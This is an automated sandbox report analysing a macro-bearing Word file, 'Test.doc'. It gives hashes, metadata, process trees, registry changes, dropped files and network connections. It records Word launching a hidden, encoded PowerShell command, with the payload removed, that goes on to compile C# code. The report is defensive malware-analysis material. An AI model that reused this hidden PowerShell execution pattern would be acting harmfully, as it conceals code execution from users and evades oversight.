File name: Test.doc

Full analysis: https://app.any.run/tasks/f3ac02b6-3050-455d-a390-3c20266ffdf3
Verdict: Malicious activity
Analysis date: October 06, 2018, 02:32:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Aaron Truax, Template: Single spaced (blank).dotx, Last Saved By: Aaron Truax, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Sat Oct 6 03:30:00 2018, Last Saved Time/Date: Sat Oct 6 03:32:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0
MD5: 58AEDDCF5DC0F0CAC3A7304522D445F8
SHA1: C7587DF7B1737B0FD92444917E69A938EEDE04E0
SHA256: 9CC441324D1D224985C4F76C9EF04959982D419AF2C6B0251E527CA62499B2C0
SSDEEP: 768:T5IoK/qNavxz5vxzgQcP3NGkfqM7Pl1XajoNe+deBtam4IvUEXOPPnjiCcVnUirj:T5IVqNavjpouViCwNtFDQkAB8Q2eakG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2108)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2108)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • powershell.exe (PID: 3828)
    • Creates files in the user directory

      • powershell.exe (PID: 3828)
      • powershell.exe (PID: 1320)
      • notepad++.exe (PID: 1796)
    • Application launched itself

      • powershell.exe (PID: 3828)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2108)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (35.9)
.xls | Microsoft Excel sheet (33.7)
.doc | Microsoft Word document (old ver.) (21.3)

EXIF

FlashPix

Title: -
Subject: -
Author: Aaron Truax
Keywords: -
Comments: -
Template: Single spaced (blank).dotx
LastModifiedBy: Aaron Truax
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2018:10:06 02:30:00
ModifyDate: 2018:10:06 02:32:00
Pages: 1
Words: 1
Characters: 6
Security: None
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 6
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Windows Latin 1 (Western European)
InternalTags: -
ContentTypeId: 0x0101006EDDDB5EE6D98C44930B742096920B300400F5B6D36B3EF94B4E9A635CDF2A18F5B8
FeatureTags: -
LocalizationTags: -
CampaignTags: -
ScenarioTags: -
LocLastLocAttemptVersionTypeLookup: -
MarketSpecific: -
ApprovalStatus: InProgress
LocComments: -
DirectSourceMarket: -
LocPublishedLinkedAssetsLookup: -
ThumbnailAssetId: -
PrimaryImageGen: 1
LegacyData: -
LocNewPublishedVersionLookup: -
NumericId: 102787001
TPFriendlyName: -
LocOverallPublishStatusLookup: -
LocRecommendedHandoff: -
BlockPublish: -
BusinessGroup: -
OpenTemplate: 1
SourceTitle: -
LocOverallLocStatusLookup: -
APEditor: -
UALocComments: -
IntlLangReviewDate: -
PublishStatusLookup: 1343188;#
ParentAssetId: -
FeatureTagsTaxHTField0: -
MachineTranslated: -
Providers: -
OriginalSourceMarket: -
APDescription: -
ContentItem: -
ClipArtFilename: -
TPInstallLocation: -
TimesCloned: -
PublishTargets: OfficeOnlineVNext
AcquiredFrom: Internal MS
AssetStart: 2011-11-23T11:29:00Z
FriendlyTitle: -
Provider: -
LastHandOff: -
TPClientViewer: -
TemplateStatus: Complete
Downloads: -
OOCacheId: -
IsDeleted: -
LocPublishedDependentAssetsLookup: -
AssetExpire: 2029-05-12T02:00:00Z
CSXSubmissionMarket: -
DSATActionTaken: -
SubmitterId: -
EditorialTags: -
TPExecutable: -
CSXSubmissionDate: -
CSXUpdate: -
AssetType: TP
ApprovalLog: -
BugNumber: -
OriginAsset: -
TPComponent: -
Milestone: -
RecommendationsModifier: -
AssetId: TP102787001
PolicheckWords: -
TPLaunchHelpLink: -
IntlLocPriority: -
TPApplication: -
IntlLangReviewer: -
HandoffToMSDN: -
PlannedPubDate: -
CrawlForDependencies: -
LocLastLocAttemptVersionLookup: 693888
LocProcessedForHandoffsLookup: -
TrustLevel: 1 Microsoft Managed Content
CampaignTagsTaxHTField0: -
TPNamespace: -
LocOverallPreviewStatusLookup: -
TaxCatchAll: -
IsSearchable: -
TemplateTemplateType: Word Document Template
Markets: -
IntlLangReview: -
UAProjectedTotalWords: -
OutputCachingOn: -
AverageRating: -
LocMarketGroupTiers2: -
APAuthor: 978;#REDMOND\v-namall
TPCommandLine: -
LocManualTestRequired: -
TPAppVersion: -
EditorialStatus: Complete
LocProcessedForMarketsLookup: -
LastModifiedDateTime: -
TPLaunchHelpLinkType: Template
ScenarioTagsTaxHTField0: -
OriginalRelease: 14
LocalizationTagsTaxHTField0: -
Manager: -
UALocRecommendation: Localize
LocOverallHandbackStatusLookup: -
ArtSampleDocs: -
UACurrentWords: -
ShowIn: Show everywhere
CSXHash: -
VoteCount: -
InternalTagsTaxHTField0: -
UANotes: -
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
Total processes: 51
Monitored processes: 10
Malicious processes: 1
Suspicious processes: 1

Behavior graph

start winword.exe no specs powershell.exe no specs powershell.exe csc.exe cvtres.exe no specs explorer.exe no specs notepad++.exe gup.exe hh.exe no specs hh.exe no specs

Process information

Fields: PID, CMD, Path, Indicators, Parent process

PID: 120
CMD: "C:\Windows\hh.exe"
Path: C:\Windows\hh.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® HTML Help Executable
Exit code: 4294967295
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
PID: 1320
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e [encoded command elided in this copy of the report]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1480
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1684
CMD: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES25F8.tmp" "c:\Users\admin\AppData\Local\Temp\CSC25F7.tmp"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Parent process: csc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® Resource File To COFF Object Conversion Utility
Exit code: 0
Version: 8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
PID: 1796
CMD: "C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\AppData\Local\Temp\~DFA937A8377C880326.TMP"
Path: C:\Program Files\Notepad++\notepad++.exe
Parent process: explorer.exe
User: admin
Company: Don HO don.h@free.fr
Integrity Level: MEDIUM
Description: Notepad++ : a free (GNU) source code editor
Exit code: 0
Version: 7.51
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2108
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Test.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
PID: 2992
CMD: "C:\Windows\hh.exe"
Path: C:\Windows\hh.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® HTML Help Executable
Exit code: 4294967295
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
PID: 3748
CMD: "C:\Program Files\Notepad++\updater\gup.exe" -v7.51
Path: C:\Program Files\Notepad++\updater\gup.exe
Parent process: notepad++.exe
User: admin
Company: Don HO don.h@free.fr
Integrity Level: MEDIUM
Description: GUP : a free (LGPL) Generic Updater
Exit code: 0
Version: 4.1
Modules
Images
c:\program files\notepad++\updater\gup.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\notepad++\updater\libcurl.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wldap32.dll
PID: 3828
CMD: powershell.exe -window hidden -e [base64-encoded command removed]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3976
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\oj8rtmb2.cmdline"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Images
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events: 1 865
Read events: 1 116
Write events: 737
Delete events: 12

Modification events

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: /h
Value: 2F7F68003C080000010000000000000000000000

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: Off

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: On

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: WORDFiles
Value: 1296433167

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1296433280

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1296433281

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation: write
Name: MTTT
Value: 3C0800002E5E1BF41C5DD40100000000

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: )`h
Value: 296068003C08000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value
Name: )`h
Value: 296068003C08000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID) Process: (2108) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0
Executable files: 0
Suspicious files: 4
Text files: 8
Unknown types: 4

Dropped files

PID | Process | Filename
2108 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR178F.tmp.cvr
3828 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M4HN8LAB70EO0EOBJ6R5.temp
1320 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OJ9111GMVZ0Z5742YKX0.temp
1320 | powershell.exe | C:\Users\admin\AppData\Local\Temp\oj8rtmb2.0.cs
1320 | powershell.exe | C:\Users\admin\AppData\Local\Temp\oj8rtmb2.cmdline
3976 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC25F7.tmp
3976 | csc.exe | C:\Users\admin\AppData\Local\Temp\oj8rtmb2.pdb
3976 | csc.exe | C:\Users\admin\AppData\Local\Temp\oj8rtmb2.dll
1684 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES25F8.tmp
3976 | csc.exe | C:\Users\admin\AppData\Local\Temp\oj8rtmb2.out
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 3
TCP/UDP connections: 3
DNS requests: 3
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | GET | 200 | 88.221.134.217:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D | unknown | der | 471 b | whitelisted
- | - | GET | 200 | 88.221.134.217:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D | unknown | der | 727 b | whitelisted
1056 | svchost.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 471 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1056 | svchost.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted
3748 | gup.exe | 37.59.28.236:443 | notepad-plus-plus.org | OVH SAS | FR | whitelisted
- | - | 88.221.134.217:80 | ocsp.usertrust.com | Akamai International B.V. | - | whitelisted

DNS requests

Domain | IP | Reputation
notepad-plus-plus.org | 37.59.28.236 | whitelisted
ocsp.usertrust.com | 88.221.134.217 | whitelisted
ocsp.digicert.com | 93.184.220.29 | whitelisted

Threats

No threats detected
Process | Message
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144